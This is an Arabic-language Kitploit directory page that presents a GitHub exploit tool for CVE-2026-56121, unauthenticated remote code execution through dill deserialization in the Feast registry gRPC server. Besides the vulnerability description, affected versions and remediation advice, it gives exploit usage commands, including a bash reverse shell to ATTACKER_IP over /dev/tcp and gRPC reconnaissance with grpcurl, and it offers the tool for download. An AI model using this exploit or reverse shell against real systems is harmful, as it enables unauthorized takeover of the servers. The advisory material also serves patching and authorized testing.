Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-56121_exploit | Kitploit
أدوات/GitHubGitHub/0xdak/cve-2026-56121_exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHub0xdak/cve-2026-56121_exploit

CVE-2026-56121_exploit

عرض المستودع
1منذ 28 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-56121 — Feast Registry تنفيذ تعليمات برمجية عن بُعد بدون مصادقة (dill.loads)

تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في خادم registry gRPC لمتجر الميزات Feast.

تعيد RPC الخاص بـ ApplyFeatureView بناء OnDemandFeatureView من proto الخاص بالطلب. وبذلك يتم فك ترميز spec.user_defined_function.body بنظام base64 ثم تمريره إلى dill.loads() — قبل أي فحص ترخيص. dill هو مجموعة شاملة من pickle، لذا فإن أي كائن يُرجع __reduce__ الخاص به (os.system, (cmd,)) ينفّذ أمرًا عشوائيًا لحظة قيام الخادم بإلغاء تسلسله. يأتي النشر الافتراضي مع auth: no_auth، لذا يكفي طلب gRPC واحد بدون مصادقة إلى منفذ registry.

  • متأثر: Feast < 0.63.0
  • تم الإصلاح في: Feast 0.63.0
  • المنفذ الافتراضي: 6570 (registry gRPC)
  • CWE: 502 (إلغاء تسلسل بيانات غير موثوقة)
  • التأثير: تنفيذ تعليمات برمجية بصلاحية مستخدم خدمة registry (غالبًا مستوى التحكم الكامل في متجر الميزات)

المتطلبات

يعيد الاستغلال استخدام protos الخاصة بـ gRPC التي ولّدها Feast نفسه، لذا ثبّت نسخة Feast قابلة للاستغلال على جهاز المهاجم:

root@kitploit:~
python3 -m venv venv && . venv/bin/activate
pip install "feast==0.62.0" grpcio

الاستخدام

root@kitploit:~
# فحص سريع (يظهر الناتج على الخادم، وليس محليًا)
python3 exploit.py 10.10.10.10:6570 -c "id"

# قشرة عكسية (غلاف bash -c: os.system يستخدم /bin/sh الذي يفتقر إلى /dev/tcp)
python3 exploit.py 10.10.10.10:6570 -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"'

يضبط -p/--project اسم المشروع (الافتراضي feature_repo). يُطبع ناتج الأمر على stdout/journal الخاص بمضيف registry، لذا استخدم قشرة عكسية أو اكتب إلى مسار قابل للقراءة لملاحظة النتائج.

تحديد الهدف

يدعم خادم registry خاصية gRPC reflection:

root@kitploit:~
grpcurl -plaintext 10.10.10.10:6570 list
# feast.registry.RegistryServer
# grpc.health.v1.Health
# grpc.reflection.v1alpha.ServerReflection

المعالجة

قم بالترقية إلى Feast 0.63.0+، وفعّل خلفية مصادقة، ولا تعرض منفذ gRPC الخاص بـ registry أبدًا لشبكات غير موثوقة.

إخلاء مسؤولية

لأغراض اختبار الأمان المصرّح به والتعليم فقط. استخدمه فقط ضد أنظمة تملكها أو لديك إذن صريح لاختبارها.

تنزيل الأداة